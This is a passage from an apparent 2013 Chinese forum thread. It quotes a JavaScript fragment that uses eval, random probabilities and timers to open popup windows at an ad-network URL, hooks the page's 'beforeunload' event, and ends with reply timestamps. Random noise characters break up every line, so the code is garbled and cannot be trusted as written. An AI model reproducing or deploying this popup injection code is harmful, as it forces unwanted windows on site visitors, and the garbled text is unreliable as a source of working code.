4 M+ \; u O& P3 G5 H9 x( w4 s - 300) 9 }1 b# b$ q% o7 E1 D
- }
0 l; D4 ^# ~& I% U/ y* M2 j - for (var i = 1; i <= 10; i++) {
2 ^8 K3 E5 W* g - var n = i == 1 ? "": i; $ T% J: b$ `; Y
- if (eval("_pt" + n + "b") > Math.random()) { 9 l6 I7 e$ Q) p% x+ o7 b: o8 O9 Q: `) \
- setTimeout(function() {
1 O$ o- E- g, ^' T, ` U - setTimeout(function() {
4 `% f6 q$ l c2 X - pop(url, {
( c+ g/ l- Q* G# u. J - a: 1, 9 U9 d- J1 n! L( @5 _& u
- b: 2 9 e5 t& v( U8 U$ w$ H2 U5 `
- }) / E7 Z7 L9 s2 i5 e) J2 L; p
- }, 2 w- T6 C% p- g
- 300) 5 z1 `1 ?/ L" s4 P
- },
5 H) m) ~4 y$ z; M - parseInt(eval("_pt" + n + "a")) * 1000)
# N9 E4 Y- H1 X, O, O+ H - }
+ f5 c7 D- Y$ f* F% [ - }
- J4 h4 u6 K1 V' l* N - if (_pc2 > Math.random()) {
5 d: y) j# E/ N& C4 t - a_pop(url)
' n: F0 j, X4 U. w - } # K+ Q) B# H; {7 ^8 r
- if (_po > Math.random()) {
) \- C! w! F' Y- e- j - try {
) d6 ^! a, i9 G( ^ - func(url) : C, d% j {& X' y8 A* N' k% W
- } catch(q) {} ! A. j' C( k, o
- }
4 J2 D% A3 c7 J4 J2 }) y - } W. g; x# e; B- h9 Z8 v
- }; 9 ?; c% Q' U. s8 m B. [3 h* V
- fstart(aa_url); / C7 f6 p# r3 }+ u. v5 M$ g
- event(window, 'beforeunload', 2 x/ o) @1 b1 H% L% M9 ^6 c3 |
- function() {})
( Z; T! O1 I5 x" }. q3 R - })();
URL从这里产生9 I. T) j7 ]( q
# b* B2 C( U3 d$ |5 n
http://play.unionsky.cn/show/?placeid=141830
6 D$ ]1 l9 J8 G% N3 X1 E- g
5 x; z* ?4 I2 R7 L% t: t* H v5 Z/ m$ W
|
发表于 2013-12-17 15:03:03
楼主
D:1
发表于 2013-12-17 15:31:30
发表于 2013-12-17 16:34:22
发表于 2013-12-17 19:34:38
